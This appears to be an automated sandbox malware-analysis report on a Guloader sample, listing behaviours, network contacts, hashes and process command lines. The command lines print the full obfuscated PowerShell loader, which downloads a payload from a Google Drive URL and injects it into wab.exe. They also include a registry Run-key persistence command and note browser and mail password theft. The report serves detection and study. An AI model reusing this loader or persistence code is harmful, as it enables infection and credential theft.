Analysis Overview
SHA256
337aa6bceb4103aa9327b569ba6809401221948a6c6386eb0ca20ffc47dbfcbb
Threat Level: Known bad
The file 337aa6bceb4103aa9327b569ba6809401221948a6c6386eb0ca20ffc47dbfcbb was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
Nirsoft
NirSoft MailPassView
NirSoft WebBrowserPassView
Blocklisted process makes network request
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Accesses Microsoft Outlook accounts
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Modifies registry key
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-21 15:42
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-21 15:42
Reported
2024-05-21 15:45
Platform
win7-20240221-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Guloader,Cloudeye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kolinski = "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\\Disputeredes\\').Semimachine;%Siestas% ($Macrorhamphosidae)" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2332 set thread context of 1784 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Swift 2024052130819616.vbs"
C:\Windows\System32\cmd.exe
cmd.exe /c ping 6777.6777.6777.677e
C:\Windows\system32\PING.EXE
ping 6777.6777.6777.677e
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skyldkreds = 1;$Ramplor='Sub';$Ramplor+='strin';$Ramplor+='g';Function Anspndelserne($Heri){$Antinuke=$Heri.Length-$Skyldkreds;For($Epiderm=7;$Epiderm -lt $Antinuke;$Epiderm+=8){$Picucule+=$Heri.$Ramplor.Invoke( $Epiderm, $Skyldkreds);}$Picucule;}function Kend224($Glassworking){. ($Truckful) ($Glassworking);}$Forkamrenes=Anspndelserne ' MonterMStranneoLunchlezPrutteriU.instrlWoodwo lOxysulpaMeet,yk/Nonha i5achymou.Specifi0Immana Saf,ful(FlertegWTriaziniProportnMegalogdAanderto FractuwKommunesL,vligh UnderfaNJa.ksniTBe,tyre Feased1rosillo0Svinge,..fledni0Lyst ac;Choktil Modsag WImpr,viiK ncelln B,otiy6 Supera4 Semida;Cent.al SarracxConurb,6Udlndin4Ud.igts;monimol RainisrKontorpvUnderbe: Gnomem1Tulipom2 Cyklin1Watte,s.A jecti0Dece,eb)Aabni,g Cresp,G ,emtoneTrsto fc,ananerkFnomen,oFolkemi/Pseudos2beclus 0Oversig1 Bromph0Svingka0Sternog1 Udstop0 Daabsv1Ergonom DukkefrFTryksvaiKeglensrTingsviePilsnerfNonimplobil.oquxHenimod/Dd.dags1Overris2 Hetero1Defekte. madaga0 Monsun ';$Veldreven=Anspndelserne ' Mis erUUltrabosde,emine OpblomrO.culat-p.racroAInterv g Po,tereHahnemanIndermatBullen ';$Cobstone=Anspndelserne ' MultichMatu attPressu tPl,isanpAlabastsEksk rs:Vestali/Dic lor/RevisordStoppegrAcromyoiSubji,ivNonprece Ho.eyw.Or rynugHomekeeo llustroImmeasugSkyllerlFagklaseBetnk,i. oernesc museneoAuktionmConvers/ForespruJudoe,lcDandlep? SmokepeInter exKnudepupFrgemanoDoktrinrFiligratGodsvog= SketchdBetalinoVagtselwTilskrenPetiverlMissy,eoClymeniaInappredSentime&PhilokliJungiand Stewpa=Galman,1ads.adiRVildbaslSpinineKAvourekASkammek_,iledamFVi,rensKRepr enSSten,ul5Cholehe0InterinwDihyd,iDStrabadLHornotiyKonstruh enkaldpIsocreo9Organog_Steno rgR.turvrYToilet 2Menusysa ch,fffsSol rredBombard8schchtn5PaleifoWHarvesa3sodioal9 photogA engtellStraahaMKommuni ';$Ulivssaar=Anspndelserne ' Hylac,>Retspri ';$Truckful=Anspndelserne 'PushtuaiSuperhueStenf.uxK ypsis ';$Bosjesman='Rigsdanske';$Formaalsbestemmelserne = Anspndelserne 'VagtskreKompasscVragr,sh Bjrneso Breaka Rettede% Ofringa Vedstap Vasicip ycophadU,recreaHusassitWhanginaskendes%F.rviss\NonpromNLepryafaKulturhr StrekacLichenio Corro .RomantiFGysninglThr.bbeaBilledv Jesuit&Mithers&Bragget G.untre Skiffec TyldishTvebakkoBegraen CaudilltSelvhjl ';Kend224 (Anspndelserne 'Progres$Slikkepg E,uadolProfitroTurbomobG idesmagennemll .using: VoksbnMCrudesmaAmtskomrSeerstoiPlethysn BrokeneWat.hmarKonditon P.antaeAfskummsOpkalds=Lgtning(randrusc nrepenmiodousnd Opp,es Patholy/ B njerc Skrald Deonera$WimplelFsta,ionoHorsemereso hagmBeregniaPrint.raR.vfisklJern etsForspanbRubaceseSnittebs Flowert MyotoneBeskinnm Udeholm errucaeFriarealRemil.ts Us rmteTranedarantini,nAttachhemaskine)Forg,en ');Kend224 (Anspndelserne 'Picture$ RavishgBath.melSavbladoFabeldyb D,casuaBurundilBarkinj: GarrisJDatarefeTelefoneCementeiSpewersnUn etrigCor ute=Slaabro$FrontinCAtaraxioGigololbZillio,sKrysantt TosidioAllerhjnAssoc ee Forure.Savneths ,rsenkpIsoplerlLiteraei Velarpt Sammen(Sl,ende$IcemanbUPlastrelPeris.aiFuturelvWimbleds No,thmsS.defteaBraefacaSrlingsrHast.rk) Bluffp ');$Cobstone=$Jeeing[0];$Optionsordning= (Anspndelserne 'Peerdom$IllumingTrikot.lMaleducoHy,ramnbNecrogra fis,ehlIslamit:ArseniuSProverbpU,licityOpgrelstEfter,ekSolersmrKhmererl LejlfrlAandsf esacri.tnTrasse,sSankask=EndorseN.teropeeDesdemowUdsprjt-,ocometO Gt,parbChri tijHyp ospe Ddebogcph lofet omfru OmitslaSSekundayRese,svsAger.netChapatieKirt,erm sprjte.SandaflNHeksekeeD,pletat,ardehv.TeknokrWfictitieHayseedb Pre,omCGlederelCharliniGrundgreDep.oran trillit');$Optionsordning+=$Marinernes[1];Kend224 ($Optionsordning);Kend224 (Anspndelserne 'Sek.ual$ Udhng.SVo,ingvp inegay OphjedtRegnskakMislighrMicroselChairm,lSvidnine rneopsn Foli bsBaymans.HolostoHPsych deHaematoaQuillajdSmutteteHelte or Fact.asF lende[ Tilsen$ orskniVFlleskre ,tokrolTorulacdSandblsrFjeldm.ewhorishvDarw niepawditenPamirim]kvalite=Ancho a$InterpuFsotols,ounderflr UruguakM elopaaUnap,alm ,pithermonicageProtubenStickupeGulvmopsPuddern ');$Frugtknivenes=Anspndelserne 'Stanchl$HalapepSLotu.blpny,alkuyNumbestt Kom.ank,olfangr TrapfalSopranel illogieAnglesmnBinocsgsUnwarra.InfluerDFis.endo PoachewCann.binp.ndoril PseudooMed,rbealev.rand.iscoloFBovspryiJuleevalBetrkkeeFakulte(Underst$SpillssCTipvognoE.issiobprovocas Unsu.ctTraw.ero Sti,fonUnvulgae Workfi,pibekon$SkyggetB Styrkelu.skrifo bicompdinfusedd PaparaoVe turanApologioHeadnotrSygdomseEtnologr Pr sopsUn vers)Rapacit ';$Bloddonorers=$Marinernes[0];Kend224 (Anspndelserne 'Obligat$TvrdraggBeevesplUrocentoLithatebUlideliaOutpushlInd,aae:,ttemasUEmpha.in.epatouf B.bestiErobr,nrN dsttemOfficern Pho eseUddeligsHitzco starveli=Piruett(ReturneT Recolle HanebjsHv,lepetEarlock-SatelliPMarasmoaForkludtlimn,phhach.lic .asagna$MortensBkatederlIn.stbeoS apsegdPlagiardQ,euerjo Promenn GeissooMotorbrr skabereKlatjedrHaemsses ostkor)Kra ile ');while (!$Unfirmness) {Kend224 (Anspndelserne 'Ban ing$ Non.ergTillidsl R.ngstoHu,mendbOvertimaBiofysilEpidias:DorerenTFrygtlorTangsp.aharc.lefHexadaci.udgetdkMerittem Schalmi S.ovlfnBenbevgiMetzuinsOldemodt FascikeTelpherrOsteope=Afbdend$formu.itEnegretrUnse,siuElegiaceFormidl ') ;Kend224 $Frugtknivenes;Kend224 (Anspndelserne ' ourishS SystemtSkrmforaKromskorGendannt Pinsel- MaanedSTortonilOmvltefeStereoreDe ikatp ekspon Whiglet4submers ');Kend224 (Anspndelserne 'Smaahan$ entalig WarfarlT,rmoploFlovesfbrdvigsea I dfinlLegepla: BirdliU unentanAna,ysefAm,hibiiStyrke.r Portatm IrrecenForderne toxicosUparti,sPrester=T,gntyp(Leas obTCompleteDu denosAnisos.tLav,ing-budgetoP imillaPy.oanttWeytymph Sogneg C.nsign$SkovvejBHunge.rl.catteroRedem,ndKonflikdTegnfoeoPrea.cinSejlgaro FarvetrAbitibieOutc,rerNonpondsIr dium)Forskni ') ;Kend224 (Anspndelserne 'Acropho$Oplreleg SkitselAlipteroCuritisbDiscomfa AdresslViseli,:Pi,fingCCirkulrhFremturrSkinmano Tar ntmUnhungri Absei.tHeat ene.pringnsHarmoni=Emissio$vestalmgSucces l Insur.oOph.halbAetomoraPistilllEskor.e:SpandgaSVagariokNullsniyProbatik Nonmatl IntellaSprr.ilpCompilepMaxierneGownanirDuelbet+Tredjed+Twifoil% Magnet$funktioJTankereeZeteticeDrfttyviAfh ldsn pre.cug rogger.D,collacAmarillo SnagesuuvenskanSkaerp,t Ch.yso ') ;$Cobstone=$Jeeing[$Chromites];}$Hypergenetic=335367;$overelaborated=30549;Kend224 (Anspndelserne 'Unallev$ anggldgHenequelAkslendob umairbUheldiga Ddsstrl Medlem:kemotergRnnebrgiSkelstenRekviemsSuper,lb,istrese BlanderAsterisg,opples Karambo=Opk app R derneGNecromae Fllesut Excell-FossernCDe astmoCaistaanPetticotKo erneeObdt,trnSkraatotscenasb Regiens$EmbedseB Undi fl Poker oEremitidLoculardBreatheoE iminen Aeronro EntrearKrydstoeGastermrPara ets Skovse ');Kend224 (Anspndelserne 'Snurret$ ThermigKalasetlPacesetoTranslab BaggagaGra slelMarinb.:FlushinLspunseniBob edesNonadvaaAntechan Fatteg6 Ju,edi7Holysto dentato=Lysshow Nierste[ KagemaSJowlbenyForesprsInd.andt,epravieMimsey,m Coying.Faub.urCAdlegiaoBindingn JazzorvNonillue Skatkar IndfartVerdens] chwei:Menne k:Ke,neldFSpec alrtenebr.ogrothitmIndstilB Neighba GeotersHerediteSil.igs6Quesc,y4ConvincSComprestDar eelrLsen leiequiponnPrintergOb tipa(Sprhjul$Py rhicgCeilingiHjer.efnStriatusU.scantbTewerheeIndvalgrcoriarigvo,mens)Disseas ');Kend224 (Anspndelserne ' Visitt$CavilsqgGavel,glSial.deoDa.delpbVi tigha Striktl Fjeder:DippercUBryds.mnsu erabaOrientaeHove,vasBifi.urtBacketchA preheeNyttigmt UndvigiPres.dec Trllea Braknin=Rdselsf Leotard[ indbanSadvokaty Dig,stsDestroytWaggonse G.ddeam Shad,w.overappT SeisemeS.ulledxApprecitUnjovia. Lipoc,EPu onslnRacewaycS,indeloAtebascdPrac,isi Digtenn nimalag Fremme]Unthrot:flleden: j rgonAfl ckleSupflowsCGo illaIShoolerIUnhateh.SidereaGSi.trygePylangitEffektfSDiscolotRet averHj rykfiVo panen SlandegKlasseh(Sko,dst$Ma.vrerLalgerieiDesinfis AtalanaTegnintn Rainwa6Ophirsn7Affects)Stavels ');Kend224 (Anspndelserne 'Unforma$Halliceg TappemlSt mpilo MaumetbLaanta aTrisoctlMeanies:BohvaerB WinnowoSha owho Skoledm RecarbiSekretinSiciliaeSealliksTailyeasnothosa=Folkesa$SkrmereUpibleden Stetsoa,inkkrteSvmmedys SchismtFrstediha.peteneIrreligtForv,rriaperturcM.talde.Zoblen,sColumnau,eminisbSindssvsRdbgenbt UnransrStvlungiKvalitenVgmalergWreathe(Damners$obstrukHLabio.ey StomodpFilmspae Kontanrphytoplg BoundeeTrytophnPrevente tilflytmes iniiPastoricIndis.u,Haffler$KorrektoMiracidv Motorce sabrelrGeneraleUnbastel,anglrka N.melsbSodfarvo.ariosrrNoseaneaInviriltForsgs eKorriged Ser,ph).agsene ');Kend224 $Boominess;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skyldkreds = 1;$Ramplor='Sub';$Ramplor+='strin';$Ramplor+='g';Function Anspndelserne($Heri){$Antinuke=$Heri.Length-$Skyldkreds;For($Epiderm=7;$Epiderm -lt $Antinuke;$Epiderm+=8){$Picucule+=$Heri.$Ramplor.Invoke( $Epiderm, $Skyldkreds);}$Picucule;}function Kend224($Glassworking){. ($Truckful) ($Glassworking);}$Forkamrenes=Anspndelserne ' MonterMStranneoLunchlezPrutteriU.instrlWoodwo lOxysulpaMeet,yk/Nonha i5achymou.Specifi0Immana Saf,ful(FlertegWTriaziniProportnMegalogdAanderto FractuwKommunesL,vligh UnderfaNJa.ksniTBe,tyre Feased1rosillo0Svinge,..fledni0Lyst ac;Choktil Modsag WImpr,viiK ncelln B,otiy6 Supera4 Semida;Cent.al SarracxConurb,6Udlndin4Ud.igts;monimol RainisrKontorpvUnderbe: Gnomem1Tulipom2 Cyklin1Watte,s.A jecti0Dece,eb)Aabni,g Cresp,G ,emtoneTrsto fc,ananerkFnomen,oFolkemi/Pseudos2beclus 0Oversig1 Bromph0Svingka0Sternog1 Udstop0 Daabsv1Ergonom DukkefrFTryksvaiKeglensrTingsviePilsnerfNonimplobil.oquxHenimod/Dd.dags1Overris2 Hetero1Defekte. madaga0 Monsun ';$Veldreven=Anspndelserne ' Mis erUUltrabosde,emine OpblomrO.culat-p.racroAInterv g Po,tereHahnemanIndermatBullen ';$Cobstone=Anspndelserne ' MultichMatu attPressu tPl,isanpAlabastsEksk rs:Vestali/Dic lor/RevisordStoppegrAcromyoiSubji,ivNonprece Ho.eyw.Or rynugHomekeeo llustroImmeasugSkyllerlFagklaseBetnk,i. oernesc museneoAuktionmConvers/ForespruJudoe,lcDandlep? SmokepeInter exKnudepupFrgemanoDoktrinrFiligratGodsvog= SketchdBetalinoVagtselwTilskrenPetiverlMissy,eoClymeniaInappredSentime&PhilokliJungiand Stewpa=Galman,1ads.adiRVildbaslSpinineKAvourekASkammek_,iledamFVi,rensKRepr enSSten,ul5Cholehe0InterinwDihyd,iDStrabadLHornotiyKonstruh enkaldpIsocreo9Organog_Steno rgR.turvrYToilet 2Menusysa ch,fffsSol rredBombard8schchtn5PaleifoWHarvesa3sodioal9 photogA engtellStraahaMKommuni ';$Ulivssaar=Anspndelserne ' Hylac,>Retspri ';$Truckful=Anspndelserne 'PushtuaiSuperhueStenf.uxK ypsis ';$Bosjesman='Rigsdanske';$Formaalsbestemmelserne = Anspndelserne 'VagtskreKompasscVragr,sh Bjrneso Breaka Rettede% Ofringa Vedstap Vasicip ycophadU,recreaHusassitWhanginaskendes%F.rviss\NonpromNLepryafaKulturhr StrekacLichenio Corro .RomantiFGysninglThr.bbeaBilledv Jesuit&Mithers&Bragget G.untre Skiffec TyldishTvebakkoBegraen CaudilltSelvhjl ';Kend224 (Anspndelserne 'Progres$Slikkepg E,uadolProfitroTurbomobG idesmagennemll .using: VoksbnMCrudesmaAmtskomrSeerstoiPlethysn BrokeneWat.hmarKonditon P.antaeAfskummsOpkalds=Lgtning(randrusc nrepenmiodousnd Opp,es Patholy/ B njerc Skrald Deonera$WimplelFsta,ionoHorsemereso hagmBeregniaPrint.raR.vfisklJern etsForspanbRubaceseSnittebs Flowert MyotoneBeskinnm Udeholm errucaeFriarealRemil.ts Us rmteTranedarantini,nAttachhemaskine)Forg,en ');Kend224 (Anspndelserne 'Picture$ RavishgBath.melSavbladoFabeldyb D,casuaBurundilBarkinj: GarrisJDatarefeTelefoneCementeiSpewersnUn etrigCor ute=Slaabro$FrontinCAtaraxioGigololbZillio,sKrysantt TosidioAllerhjnAssoc ee Forure.Savneths ,rsenkpIsoplerlLiteraei Velarpt Sammen(Sl,ende$IcemanbUPlastrelPeris.aiFuturelvWimbleds No,thmsS.defteaBraefacaSrlingsrHast.rk) Bluffp ');$Cobstone=$Jeeing[0];$Optionsordning= (Anspndelserne 'Peerdom$IllumingTrikot.lMaleducoHy,ramnbNecrogra fis,ehlIslamit:ArseniuSProverbpU,licityOpgrelstEfter,ekSolersmrKhmererl LejlfrlAandsf esacri.tnTrasse,sSankask=EndorseN.teropeeDesdemowUdsprjt-,ocometO Gt,parbChri tijHyp ospe Ddebogcph lofet omfru OmitslaSSekundayRese,svsAger.netChapatieKirt,erm sprjte.SandaflNHeksekeeD,pletat,ardehv.TeknokrWfictitieHayseedb Pre,omCGlederelCharliniGrundgreDep.oran trillit');$Optionsordning+=$Marinernes[1];Kend224 ($Optionsordning);Kend224 (Anspndelserne 'Sek.ual$ Udhng.SVo,ingvp inegay OphjedtRegnskakMislighrMicroselChairm,lSvidnine rneopsn Foli bsBaymans.HolostoHPsych deHaematoaQuillajdSmutteteHelte or Fact.asF lende[ Tilsen$ orskniVFlleskre ,tokrolTorulacdSandblsrFjeldm.ewhorishvDarw niepawditenPamirim]kvalite=Ancho a$InterpuFsotols,ounderflr UruguakM elopaaUnap,alm ,pithermonicageProtubenStickupeGulvmopsPuddern ');$Frugtknivenes=Anspndelserne 'Stanchl$HalapepSLotu.blpny,alkuyNumbestt Kom.ank,olfangr TrapfalSopranel illogieAnglesmnBinocsgsUnwarra.InfluerDFis.endo PoachewCann.binp.ndoril PseudooMed,rbealev.rand.iscoloFBovspryiJuleevalBetrkkeeFakulte(Underst$SpillssCTipvognoE.issiobprovocas Unsu.ctTraw.ero Sti,fonUnvulgae Workfi,pibekon$SkyggetB Styrkelu.skrifo bicompdinfusedd PaparaoVe turanApologioHeadnotrSygdomseEtnologr Pr sopsUn vers)Rapacit ';$Bloddonorers=$Marinernes[0];Kend224 (Anspndelserne 'Obligat$TvrdraggBeevesplUrocentoLithatebUlideliaOutpushlInd,aae:,ttemasUEmpha.in.epatouf B.bestiErobr,nrN dsttemOfficern Pho eseUddeligsHitzco starveli=Piruett(ReturneT Recolle HanebjsHv,lepetEarlock-SatelliPMarasmoaForkludtlimn,phhach.lic .asagna$MortensBkatederlIn.stbeoS apsegdPlagiardQ,euerjo Promenn GeissooMotorbrr skabereKlatjedrHaemsses ostkor)Kra ile ');while (!$Unfirmness) {Kend224 (Anspndelserne 'Ban ing$ Non.ergTillidsl R.ngstoHu,mendbOvertimaBiofysilEpidias:DorerenTFrygtlorTangsp.aharc.lefHexadaci.udgetdkMerittem Schalmi S.ovlfnBenbevgiMetzuinsOldemodt FascikeTelpherrOsteope=Afbdend$formu.itEnegretrUnse,siuElegiaceFormidl ') ;Kend224 $Frugtknivenes;Kend224 (Anspndelserne ' ourishS SystemtSkrmforaKromskorGendannt Pinsel- MaanedSTortonilOmvltefeStereoreDe ikatp ekspon Whiglet4submers ');Kend224 (Anspndelserne 'Smaahan$ entalig WarfarlT,rmoploFlovesfbrdvigsea I dfinlLegepla: BirdliU unentanAna,ysefAm,hibiiStyrke.r Portatm IrrecenForderne toxicosUparti,sPrester=T,gntyp(Leas obTCompleteDu denosAnisos.tLav,ing-budgetoP imillaPy.oanttWeytymph Sogneg C.nsign$SkovvejBHunge.rl.catteroRedem,ndKonflikdTegnfoeoPrea.cinSejlgaro FarvetrAbitibieOutc,rerNonpondsIr dium)Forskni ') ;Kend224 (Anspndelserne 'Acropho$Oplreleg SkitselAlipteroCuritisbDiscomfa AdresslViseli,:Pi,fingCCirkulrhFremturrSkinmano Tar ntmUnhungri Absei.tHeat ene.pringnsHarmoni=Emissio$vestalmgSucces l Insur.oOph.halbAetomoraPistilllEskor.e:SpandgaSVagariokNullsniyProbatik Nonmatl IntellaSprr.ilpCompilepMaxierneGownanirDuelbet+Tredjed+Twifoil% Magnet$funktioJTankereeZeteticeDrfttyviAfh ldsn pre.cug rogger.D,collacAmarillo SnagesuuvenskanSkaerp,t Ch.yso ') ;$Cobstone=$Jeeing[$Chromites];}$Hypergenetic=335367;$overelaborated=30549;Kend224 (Anspndelserne 'Unallev$ anggldgHenequelAkslendob umairbUheldiga Ddsstrl Medlem:kemotergRnnebrgiSkelstenRekviemsSuper,lb,istrese BlanderAsterisg,opples Karambo=Opk app R derneGNecromae Fllesut Excell-FossernCDe astmoCaistaanPetticotKo erneeObdt,trnSkraatotscenasb Regiens$EmbedseB Undi fl Poker oEremitidLoculardBreatheoE iminen Aeronro EntrearKrydstoeGastermrPara ets Skovse ');Kend224 (Anspndelserne 'Snurret$ ThermigKalasetlPacesetoTranslab BaggagaGra slelMarinb.:FlushinLspunseniBob edesNonadvaaAntechan Fatteg6 Ju,edi7Holysto dentato=Lysshow Nierste[ KagemaSJowlbenyForesprsInd.andt,epravieMimsey,m Coying.Faub.urCAdlegiaoBindingn JazzorvNonillue Skatkar IndfartVerdens] chwei:Menne k:Ke,neldFSpec alrtenebr.ogrothitmIndstilB Neighba GeotersHerediteSil.igs6Quesc,y4ConvincSComprestDar eelrLsen leiequiponnPrintergOb tipa(Sprhjul$Py rhicgCeilingiHjer.efnStriatusU.scantbTewerheeIndvalgrcoriarigvo,mens)Disseas ');Kend224 (Anspndelserne ' Visitt$CavilsqgGavel,glSial.deoDa.delpbVi tigha Striktl Fjeder:DippercUBryds.mnsu erabaOrientaeHove,vasBifi.urtBacketchA preheeNyttigmt UndvigiPres.dec Trllea Braknin=Rdselsf Leotard[ indbanSadvokaty Dig,stsDestroytWaggonse G.ddeam Shad,w.overappT SeisemeS.ulledxApprecitUnjovia. Lipoc,EPu onslnRacewaycS,indeloAtebascdPrac,isi Digtenn nimalag Fremme]Unthrot:flleden: j rgonAfl ckleSupflowsCGo illaIShoolerIUnhateh.SidereaGSi.trygePylangitEffektfSDiscolotRet averHj rykfiVo panen SlandegKlasseh(Sko,dst$Ma.vrerLalgerieiDesinfis AtalanaTegnintn Rainwa6Ophirsn7Affects)Stavels ');Kend224 (Anspndelserne 'Unforma$Halliceg TappemlSt mpilo MaumetbLaanta aTrisoctlMeanies:BohvaerB WinnowoSha owho Skoledm RecarbiSekretinSiciliaeSealliksTailyeasnothosa=Folkesa$SkrmereUpibleden Stetsoa,inkkrteSvmmedys SchismtFrstediha.peteneIrreligtForv,rriaperturcM.talde.Zoblen,sColumnau,eminisbSindssvsRdbgenbt UnransrStvlungiKvalitenVgmalergWreathe(Damners$obstrukHLabio.ey StomodpFilmspae Kontanrphytoplg BoundeeTrytophnPrevente tilflytmes iniiPastoricIndis.u,Haffler$KorrektoMiracidv Motorce sabrelrGeneraleUnbastel,anglrka N.melsbSodfarvo.ariosrrNoseaneaInviriltForsgs eKorriged Ser,ph).agsene ');Kend224 $Boominess;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Narco.Fla && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 6777.6777.6777.677e | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
Files
memory/2692-4-0x000007FEF5BFE000-0x000007FEF5BFF000-memory.dmp
memory/2692-6-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
memory/2692-5-0x000000001B610000-0x000000001B8F2000-memory.dmp
memory/2692-8-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
memory/2692-7-0x0000000001D10000-0x0000000001D18000-memory.dmp
memory/2692-9-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
memory/2692-10-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
memory/2692-11-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NMVHAWC4JUP45QYF4J1X.temp
| MD5 | d67dd93a9e8101b470d1515d0ed0bf71 |
| SHA1 | 8e669de97d9115b671c375568d4591c0d30add01 |
| SHA256 | a69a74ce6b0c93318557667b4b8dba78e8467e078fa4974677bcb0c2614a1fef |
| SHA512 | ca25afab24a62dc9bdc5f470153c0f10483dba5088f0c4b199760c68487907a20767ef6f2f546434aa6198251f2b648f1b7ec390453bb9ee484543e1917f1a01 |
C:\Users\Admin\AppData\Roaming\Narco.Fla
| MD5 | 5b31fdcca43851229c6ad5c0d5124d9e |
| SHA1 | 95243324bfd6acd008518e233e5ac3a7a29e67a5 |
| SHA256 | c288a9c83ad9236a539faddaaa2d90d0beb42cc28c9b2f8009676ccd15b6b842 |
| SHA512 | e4446a71ba0ce278980fdb6d286b55adcc97dd5b5a3c36da978de06916846bcc05cdf6ce8adb4176693b1d896c8ddd5499e37ab3ab08e8bac7468495c84038f5 |
memory/2332-17-0x00000000065F0000-0x00000000092BB000-memory.dmp
memory/2692-18-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
memory/2692-19-0x000007FEF5BFE000-0x000007FEF5BFF000-memory.dmp
memory/1784-41-0x0000000001CF0000-0x00000000049BB000-memory.dmp
memory/1784-43-0x0000000000C80000-0x0000000001CE2000-memory.dmp
memory/2692-44-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-21 15:42
Reported
2024-05-21 15:45
Platform
win10v2004-20240426-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Guloader,Cloudeye
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
